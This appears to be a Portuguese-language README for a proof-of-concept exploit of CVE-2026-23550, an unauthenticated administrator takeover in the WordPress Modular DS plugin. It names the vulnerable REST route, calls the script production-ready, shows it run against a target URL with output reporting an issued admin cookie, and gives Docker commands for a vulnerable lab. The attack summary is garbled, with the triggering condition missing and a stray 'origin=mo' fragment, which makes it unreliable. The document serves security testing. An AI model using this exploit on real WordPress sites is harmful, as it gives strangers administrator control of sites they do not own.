
CVE-2026-23550 - Plugin WordPress Modular DS **Acesso de Administrador Não Autenticado**
Prova de Conceito (PoC) demonstrando a CVE-2026-23550 - tomada de conta de administrador crítica e não autenticada no plugin WordPress Modular DS (versões ≤2.5.1). Explorada ativamente em produção.

Resumo do Ataque: Roteamento de API REST falho em /api/modular-connector/login contorna a autenticação do WordPress quando , concedendo cookies de sessão de administrador não autenticados.
origin=mo# PoC pronto para produção
./CVE-2026-23550-PoC.sh http://target.com
[+] CVE-2026-23550 Teste de Exploração do Modular Connector
[+] VULNERÁVEL: Cookie de sessão de administrador emitido
O endpoint REST afetado é acessível exclusivamente através do mecanismo ?rest_route=; o acesso direto via /wp-json/ pode não estar disponível. A vulnerabilidade permite acesso não autenticado sem credenciais ou validação de nonce. A emissão bem-sucedida de um cookie de sessão de administrador do WordPress constitui confirmação da exploração. Esta prova de conceito não executa nenhuma ação administrativa. A versão 2.5.0 do Modular DS é usada durante os testes.
mkdir -p ~/Desktop/CVE-2026-23550/cve-poc-wp
cd ~/Desktop/CVE-2026-23550/cve-poc-wp
version: "3.9"
services:
db:
image: mysql:8.0
restart: always
environment:
MYSQL_ROOT_PASSWORD: rootpass
MYSQL_DATABASE: wordpress
MYSQL_USER: wpuser
MYSQL_PASSWORD: wppass
volumes:
- db_data:/var/lib/mysql
wordpress:
image: wordpress:6.4.3-php8.2-apache
depends_on:
- db
ports:
- "8080:80"
restart: always
environment:
WORDPRESS_DB_HOST: db:3306
WORDPRESS_DB_USER: wpuser
WORDPRESS_DB_PASSWORD: wppass
WORDPRESS_DB_NAME: wordpress
volumes:
- wp_data:/var/www/html
volumes:
db_data:
wp_data:
docker compose up -d
docker compose logs -f db
Aguarde por: "ready for connections"
curl http://localhost:8080/?rest_route=/
Esperado:
{
"name": "...",
"namespaces": [...]
}
Se isso falhar → PARE, o ambiente está quebrado.
wget https://downloads.wordpress.org/plugin/modular-connector.2.5.0.zip
unzip modular-connector.2.5.0.zip
WORDPRESS_ID=$(docker compose ps -q wordpress)
docker cp modular-connector "$WORDPRESS_ID":/var/www/html/wp-content/plugins/
docker exec "$WORDPRESS_ID" chown -R www-data:www-data \
/var/www/html/wp-content/plugins/modular-connector
chmod +x CVE-2026-23550-PoC.sh
./CVE-2026-23550-PoC.sh http://localhost:8080/
Nota: Se você quiser cookies em um arquivo de texto, remova "rm -f "$COOKIE_JAR"" do arquivo poc.sh.
Licença MIT - Apenas para pesquisa de segurança e testes de penetração autorizados. Não para uso malicioso. Divulgue de forma responsável.
Este PoC é apenas para testes de segurança autorizados. O uso não autorizado contra sistemas de produção é ilegal. Reporte descobertas aos mantenedores do plugin.